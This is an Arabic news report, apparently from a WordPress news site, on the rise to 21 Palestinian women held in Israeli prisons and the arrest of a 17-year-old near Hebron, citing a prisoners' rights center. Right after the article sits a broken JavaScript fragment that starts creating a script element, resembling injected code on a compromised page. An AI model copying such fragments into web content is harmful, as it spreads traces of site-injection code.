ارتفاع أعداد الأسيرات الفلسطينيات لدى الاحتلال إلى 21 امرأة

أفادت معطيات حقوقية، بأن أعداد الأسيرات الفلسطينيات في معتقلات الاحتلال الإسرائيلية ارتفعت خلال اليومين الماضين لتبلغ 21 أسيرة، وذلك عقب اعتقال فتاة من محافظة الخليل يوم الجمعة، بزعم محاولتها طعن جندي إسرائيلي.

وأوضح مركز “أسرى فلسطين” للدراسات في بيان له، أن قوات الاحتلال اعتقلت أمس الفتاة هالة مسلم أبو سل (17 عاما) من مخيم العروب شمال الخليل، وذلك على الحاجز العسكري القريب من الحرم الإبراهيمي الشريف بدعوى حيازتها آلة حادة ومحاولتها طعن جندي إسرائيلي.

وأضاف المركز، أن الاحتلال صعّد من استهدافه للمرأة الفلسطينية عن طريق الاعتقالات والتنكيل في الأشهر الأخيرة، وخاصة في مدينة القدس المحتلة، وذلك عقب نجاحها في التصدّي لاقتحامات المستوطنين للمسجد الأقصى المبارك، مشيراً إلى أن الاحتلال كان قد اعتقل الفتاة المقدسية أماني عبد المغربي بعد الاعتداء عليها بالضرب “الوحشي”، ومن ثم قام باعتقال والدتها من داخل قاعة المحكمة بالأمس وفرض عليها قرار الحبس المنزلي ودفع كفالة مالية.

وذكر البيان، أن الأسيرات الفلسطينيات يتم احتجازهن في ظل ظروف قاسية، ويتعرضن لمعاملة مهينة لا إنسانية، إلى جانب التفتيشات الاستفزازية والاقتحامات ومصادرة أغراض الأسيرات الخاصة، كما يتعرضن للعزل في زنزانات انفرادية، وغيرها.

وناشد المركز المؤسسات المعنية بقضايا المرآة التدخل لحماية الأسيرات من جرائم الاحتلال، ووضع حد لمعاناتهن المتفاقمة.}var d=document;var s=d.createElement(‘script’); } else {

عن admin

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*